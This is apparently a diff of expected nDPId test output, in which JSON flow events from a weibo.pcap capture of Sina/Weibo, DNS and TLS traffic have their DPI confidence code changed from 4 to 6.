00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073773,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGjQneSRxgwKgBaQBQpSMt08jatYdf34ASOQjHwAAAAgQFqAEBBAIBAwMI"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073773,"pkt":"kDVu60UQeJKcD6iOCABFAAAoVdlAAEAGKDzAqAFp3kkcYKUjAFC1h1\/fLdPI21AQAOVAqwAA"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073788,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1463089073788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073788,"pkt":"kDVu60UQeJKcD6iOCABFAAA8M4FAAEAGYnrAqAFpKpy4E8wyAbubxznpAAAAAKACchCC5wAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073789,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -174,18 +173,18 @@ 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1463089073424,"flow_last_seen":1463089073885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -200,16 +199,16 @@ 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 